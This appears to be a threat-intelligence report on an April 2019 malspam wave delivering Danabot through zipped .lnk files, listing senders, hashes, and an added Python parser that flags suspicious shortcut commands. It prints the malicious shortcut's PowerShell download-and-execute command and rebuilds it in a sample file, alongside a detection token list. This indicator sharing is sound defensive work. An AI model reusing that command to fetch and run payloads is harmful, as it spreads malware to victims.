malware_traffic

2019-04-19 - malspam pushing Danabot

Apr 19th, 2019
2019-04-19 - MALSPAM WITH ATTACHED ARCHIVES CONTAINING .LNK FILES PUSHING DANABOT

CHAIN OF EVENTS:

Email --> Attached zip archive --> Extracted .lnk file --> 1.5 MB VBS retrieved from business4good[.]eu/hren.php --> 481 kB Danabot EXE created by VBS file

$ grep Subject *.eml
2019-04-19-malspam-0228-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0232a-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0232b-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0238-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0241-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0251-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0256-UTC.eml:Subject: Inner City CRR Network Meeting
2019-04-19-malspam-0503-UTC.eml:Subject: Inner City CRR Network Meeting

$ grep From: *.eml
2019-04-19-malspam-0228-UTC.eml:From: Betty Wellman <7e754@3bc73.com>
2019-04-19-malspam-0232a-UTC.eml:From: "Ravizee, Monica" <8f863d34@c5447.edu>
2019-04-19-malspam-0232b-UTC.eml:From: "Duffy, Kasey" <4ef33a@ea98e70.edu>
2019-04-19-malspam-0238-UTC.eml:From: <62a@4c90fe.com>
2019-04-19-malspam-0241-UTC.eml:From: Sahnly Phan-Chan Pha0194 <d3325d5@13c5aa11886a3a316e42d.au>
2019-04-19-malspam-0251-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=
2019-04-19-malspam-0256-UTC.eml:From: =?utf-8?B?2LPYp9ix2Kkg2LnYqNiv2KfZhNmF2K3Ys9mGINmF2K3ZhdivINi52KjYr9in?=
2019-04-19-malspam-0503-UTC.eml:From: =?utf-8?B?2YfZitmB2KfYoSDZhdit2YXYryDYs9i52K8g2KfZhNi02KjZitio?=

$ grep filename= *.eml
2019-04-19-malspam-0228-UTC.eml:Content-Disposition: attachment; filename="nMeeert19583.zip"; size=28635;
2019-04-19-malspam-0232a-UTC.eml:Content-Disposition: attachment; filename="nMeeert78598.zip"; size=27866;
2019-04-19-malspam-0232b-UTC.eml:Content-Disposition: attachment; filename="nMeeert55514.zip"; size=30056;
2019-04-19-malspam-0238-UTC.eml:Content-Disposition: attachment; filename="nMeeert91228.zip"; size=21880;
2019-04-19-malspam-0241-UTC.eml:Content-Disposition: attachment; filename="nMeeert47131.zip"; size=26269;
2019-04-19-malspam-0251-UTC.eml:Content-Disposition: attachment; filename="nMeeert74116.zip"; size=27517;
2019-04-19-malspam-0256-UTC.eml:Content-Disposition: attachment; filename="nMeeert9433.zip"; size=25205;
2019-04-19-malspam-0503-UTC.eml:Content-Disposition: attachment; filename="nMeeert30458.zip"; size=28133;

$ shasum -a 256 *.eml
085d0045e93c59ba8fcbac06f09caa3cf63c5b37353f6722600c6faa167940dc 2019-04-19-malspam-0228-UTC.eml
1cd2b8a8e7519e7902601230df061fffc8c1a033e0a3d6dadbc20b258b46c017 2019-04-19-malspam-0232a-UTC.eml
5914536c8da0feedb01ce78114b99d8d23b074a28c291588673587eca62d64a1 2019-04-19-malspam-0232b-UTC.eml
0f5f3b6023557c3480ed28cbcadbaf426969ef83f297d30bcd796ea03b22bc23 2019-04-19-malspam-0238-UTC.eml
9604d0cc7b98b56cd7b811e2cde91172ad7187d88a3df075b616e00bfe743f8c 2019-04-19-malspam-0241-UTC.eml
f314783a04bf0bf69d69baf55d79248f731580fe1ccf5c4773edea48141dcdf4 2019-04-19-malspam-0251-UTC.eml
722b896aee101545a83b45f751d9c111d81be1f9d45a0d9520c18ead40a2c38b 2019-04-19-malspam-0256-UTC.eml
15019b15348aeabffc81af614378900e87e455bd5538e6c4e4d7430b59e5f4db 2019-04-19-malspam-0503-UTC.eml

$ shasum -a 256 *.zip
1b214e8fb5ee2561d7dc32ae6075b9d984e55968fcec453d7c0d69591adde724 nMeeert19583.zip
e0abcda09bdf517bfebfc26a8f12bbf3202e709ef8a4a23383e9900bc6077c67 nMeeert30458.zip
e55458aac38ef9bd06e5e82c90c369f4ed89e0fa599f703271ec3f6ab9638011 nMeeert47131.zip
eeba8af15905e1f00ae45720998ff6fd4e4d2124672b78fdd72de67dcaae4c93 nMeeert55514.zip
3cd388ddd9a45a0eb5e2defb5941251d8b44ba9fe88ef30306fe00629af7ac17 nMeeert74116.zip
6b962a63f26cfbe6fba89f58522ee99e63e1e655f477cb58d6411ad991e813f2 nMeeert78598.zip
e29af015c6df4b291d90591100cd6c63c21f8ed7218d596ea8ab4af7dad919dc nMeeert91228.zip
ed1beff140614fc40d72d665baf1ff1b1bd9e75705e4f8583a22a0116b2dbf76 nMeeert9433.zip

$ shasum -a 256 *.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert19583.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert30458.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert47131.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert55514.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert74116.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert78598.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert91228.lnk
b9f30f5ddf614e5e449a930b1fb5019cdc004b804ab72efcb3a716b30879195d nMeeert9433.lnk

NOTE: all eight archives extract to the same .lnk file (one SHA256 hash across all of them), so a single hash covers this wave.

SHORTCUT FROM .LNK FILE:

C:\Windows\System32\cmd.exe /c @echo off&powershell -command Invoke-WebRequest "hxxp://business4good[.]eu/hren.php" -OutFile "%tmp%\tmp856845.vbs"; start-process %tmp%\tmp856845

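The shortcut above is the entire first stage, so the one field a triage analyst wants out of each .lnk is its command line. The Python below is an added example, not code from this paste or from malware-traffic-analysis.net: a minimal parser for the MS-SHLLINK StringData fields (relative path, working directory, arguments) that skips the LinkTargetIDList and LinkInfo blocks by their size fields, plus a token and URL check for the download-and-execute pattern. The sample shortcut is constructed inside the block from the command line reported above; its relative path, working directory and the defanged hxxp URL are assumptions for the demonstration, and the real .lnk from the malspam is not embedded here.

```python
"""Minimal MS-SHLLINK (.lnk) parser for triage: pull the target path and
command-line arguments out of a Windows shortcut and flag the
download-and-execute pattern from the Danabot malspam above.
Added example, not part of the original paste; the sample shortcut is
constructed here from the command line the paste reports."""
import re
import struct
from typing import Dict, List

# CLSID 00021401-0000-0000-C000-000000000046 in little-endian GUID layout
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags (MS-SHLLINK 2.1.1); only the bits this parser needs
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData items appear in this fixed order when their flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Tokens typical of LNK droppers; a hit is a triage signal, not proof
SUSPICIOUS_TOKENS = ("cmd.exe", "powershell", "invoke-webrequest", "downloadstring",
                     "start-process", "%tmp%", "%temp%", "mshta", "wscript", "cscript",
                     "certutil", "bitsadmin", "-enc")
URL_RE = re.compile(r"(?:https?|hxxps?)://[^\s\"'<>]+", re.IGNORECASE)


def _read_string(buf: bytes, off: int, unicode: bool):
    """One StringData item: 2-byte CountCharacters followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        end = off + count * 2
        return buf[off:end].decode("utf-16-le"), end
    end = off + count
    return buf[off:end].decode("cp1252", errors="replace"), end


def parse_lnk(buf: bytes) -> Dict[str, str]:
    """Return the StringData fields of a shell link keyed by field name."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    (flags,) = struct.unpack_from("<I", buf, 0x14)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip: 2-byte IDListSize + IDList
        (size,) = struct.unpack_from("<H", buf, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                    # skip: LinkInfoSize counts itself
        (size,) = struct.unpack_from("<I", buf, off)
        off += size
    fields: Dict[str, str] = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            fields[key], off = _read_string(buf, off, bool(flags & IS_UNICODE))
    return fields


def suspicious_tokens(fields: Dict[str, str]) -> List[str]:
    """Case-insensitive token hits across target, working dir and arguments."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    return [t for t in SUSPICIOUS_TOKENS if t in text]


def extract_urls(fields: Dict[str, str]) -> List[str]:
    """URLs (live or hxxp-defanged) embedded in the argument string."""
    return URL_RE.findall(fields.get("arguments", ""))


def build_lnk(relative_path: str, arguments: str, working_dir: str = "") -> bytes:
    """Build a minimal Unicode shell link: header, empty IDList, StringData."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if working_dir:
        flags |= HAS_WORKING_DIR
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # ShowCommand=1 (SW_SHOWNORMAL)
    idlist = struct.pack("<H", 2) + b"\x00\x00"             # IDListSize=2: TerminalID only

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + idlist + s(relative_path) + (s(working_dir) if working_dir else b"") + s(arguments)


# Constructed sample (assumption): the paste's command line as a relative-path link.
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    '/c @echo off&powershell -command Invoke-WebRequest "hxxp://business4good[.]eu/hren.php" '
    r'-OutFile "%tmp%\tmp856845.vbs"; start-process %tmp%\tmp856845',
    working_dir=r"C:\Windows\System32",
)

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["relative_path"], parsed["arguments"])
    print("tokens:", suspicious_tokens(parsed))
    print("urls:", extract_urls(parsed))
```

Run it against a real sample with parse_lnk(open(path, "rb").read()). A shortcut that carries only a LinkTargetIDList and no RELATIVE_PATH keeps its target inside the IDList, which this parser skips, so an empty result is a reason to fall back to a full parser rather than a clean bill of health; a live sample will also contain http:// rather than the defanged hxxp:// used here.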
ASSOCIATED MALWARE:

SHA256 hash: f2d51add5d58d4712d9e024f1e9bdb0f6d4955a749b6a09972344dfd778b8ca4
File size: 1,544,171 bytes
File location: hxxp://business4good[.]eu/hren.php
File location: C:\Users\[username]\AppData\Local\Temp\tmp856845.vbs
File description: Initial VBS file downloaded after double-clicking extracted LNK file.
Any.Run analysis: https://app.any.run/tasks/353a979f-df1c-4512-9c71-f1e77ad14ae5

SHA256 hash: 9f98291702605aed9e61085a4e9d4e83cfe0942757542487fd36da92cdbd48e9
File size: 480,768 bytes
File location: C:\Users\[username]\AppData\Local\Temp\tOIRccbdGFRn.dllMvVviGEN
File description: Danabot EXE created by the above VBS file
Any.Run analysis: https://app.any.run/tasks/a6ebc434-3cdc-4aa2-8665-6a984fbfc727